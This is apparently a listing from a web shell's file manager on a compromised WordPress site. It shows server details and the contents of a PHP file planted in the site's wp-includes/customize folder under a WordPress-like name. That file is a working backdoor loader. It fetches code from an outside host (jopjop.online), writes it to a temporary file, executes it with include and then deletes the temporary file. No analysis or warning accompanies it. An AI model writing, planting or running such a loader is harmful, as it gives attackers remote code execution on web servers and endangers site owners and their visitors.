HEX
Server: LiteSpeed
System: Linux premium12.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: desetmhw (842)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/desetmhw/estraveltourim.site/wp-includes/customize/bottom-1756990898.php
<!--6zDklGHc-->
<?php
$url = 'https://jopjop.online/wp-manage.txt';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$code = curl_exec($ch);
curl_close($ch);

if ($code) {
    $temp_file = tempnam(sys_get_temp_dir(), 'wp_manage_');
    file_put_contents($temp_file, $code);
    include $temp_file;
    unlink($temp_file);
} else {
    echo "error";
}
?>